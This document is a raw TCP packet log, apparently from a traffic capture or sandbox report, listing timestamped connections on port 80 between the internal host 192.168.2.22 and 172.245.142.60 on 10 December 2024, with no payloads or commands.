                                                                                            Dec 10, 2024 06:57:50.775048971 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.775058031 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.775101900 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.779215097 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.779263020 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.779299974 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.779340982 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.783381939 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.783428907 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.783478022 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.783530951 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.787534952 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.787585020 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.787635088 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.787681103 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.791743040 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.791790962 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.791838884 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.791884899 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.795947075 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.795995951 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.796039104 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.796077967 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.800131083 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.800174952 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.800249100 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.800292015 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.804315090 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.804366112 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.804410934 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.804456949 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.808558941 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.808607101 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.808681011 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.808716059 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.812709093 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.812757015 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.812827110 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.812865973 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.816894054 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.816936016 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.816982031 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.817023039 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.821105957 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.821156025 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.821193933 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.821229935 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.825261116 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.825299025 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.825350046 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.825386047 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.829509020 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.829556942 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.829586029 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.829626083 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.833652020 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.833698034 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.833755016 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.833802938 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.839071035 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.839088917 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.839135885 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.842046022 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.842096090 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.842164040 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.842201948 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.846244097 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.846306086 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.846348047 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.846390009 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.850439072 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.850502968 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.850538969 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.850574017 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.854664087 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.854717970 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.854763985 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.854806900 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.858822107 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.858880043 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.858932972 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.858967066 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.875852108 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.875864983 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.875916958 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.948539972 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.948612928 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.948724985 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.950411081 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.950458050 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.950509071 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.950551033 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.954214096 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.954236984 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.954265118 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.954277039 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.957986116 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.958034992 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.958122015 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.958170891 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.961666107 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.961715937 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.961751938 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.961792946 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.965226889 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.965281963 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.965352058 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.965451956 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.968827963 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.968879938 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.968950987 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.968995094 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.972166061 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.972223043 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.972259998 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.972304106 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.975562096 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.975614071 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.975682020 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.975733042 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.978801966 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.978847027 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.978914022 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.978959084 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.982033014 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.982091904 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.982129097 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.982176065 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.985176086 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.985239029 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.985305071 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.985349894 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.988253117 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.988321066 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.988363981 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.988413095 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.991333008 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.991398096 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.991406918 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.991451025 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.994545937 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.994606972 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.994652987 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.994694948 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.997504950 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.997566938 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:50.997637987 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:50.997683048 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:51.000555992 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:51.000607014 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:51.000672102 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:51.000713110 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:51.003649950 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:51.003705025 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:51.003751040 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:51.003787041 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:51.005172014 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:51.005223989 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:55.199390888 CET8049166172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:55.199763060 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:56.958822966 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:56.997210979 CET4916680192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:57.078193903 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:57.078250885 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:57.078409910 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:57.197664022 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.218962908 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.218981028 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.218991995 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219034910 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219044924 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219043016 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.219055891 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219068050 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219086885 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.219086885 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.219086885 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.219099998 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.219274998 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219335079 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219346046 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.219372988 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.219384909 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.221299887 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.338639975 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.338654995 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.338905096 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.342535019 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.342602015 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.410912991 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.410944939 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.411010981 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.415064096 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.415122032 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.415139914 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.415255070 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.423397064 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.423449993 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.426445961 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.426501036 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.426584005 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.426630974 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.434804916 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.434823990 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.434871912 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.443172932 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.443236113 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.443270922 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.443442106 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.451508045 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.451567888 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.451611042 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.451764107 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.459892988 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.459949017 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.459952116 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.460146904 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.468415022 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.468467951 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.468620062 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.468678951 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.476567984 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.476629019 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.476691008 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.476805925 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.484989882 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.485045910 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.485080004 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.485236883 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.492856979 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.492913961 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.492924929 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.493072987 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.530343056 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.530396938 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.603055000 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.603110075 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.603172064 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.603220940 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.606996059 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.607042074 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.607095003 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.607141972 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.614898920 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.614945889 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.614991903 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.615161896 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.622766018 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.622817993 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.622942924 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.622994900 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.630654097 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.630721092 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.630759954 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.631056070 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.638674021 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.638686895 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.638736010 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.646476030 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.646552086 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.647790909 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.654321909 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.654372931 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.654429913 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.654524088 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.662168026 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.662228107 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.662323952 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.670093060 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.670150042 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.670183897 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.670247078 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.673891068 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.673943996 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.674099922 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.674144983 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.677797079 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.677848101 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.678050041 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.678095102 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.681458950 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.681508064 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.681570053 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.681606054 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.685287952 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.685337067 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.685394049 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.685441017 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.689064026 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.689111948 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.689173937 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.689228058 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.692913055 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.692960978 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.693028927 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.693073988 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.696722031 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.696768999 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.697314978 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.697360992 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.700495958 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.700539112 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.700555086 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.700654984 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.705117941 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.705163956 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.705185890 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.705286026 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.708090067 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.708137035 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.708203077 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.708249092 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.711895943 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.711940050 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.712014914 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.712061882 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.715820074 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.715866089 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.715945959 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.715989113 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.722462893 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.722632885 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.723778963 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.724276066 CET8049167172.245.142.60192.168.2.22
                                                                                            Dec 10, 2024 06:57:58.727775097 CET4916780192.168.2.22172.245.142.60
                                                                                            Dec 10, 2024 06:57:58.795191050 CET8049167172.245.142.60192.168.2.22
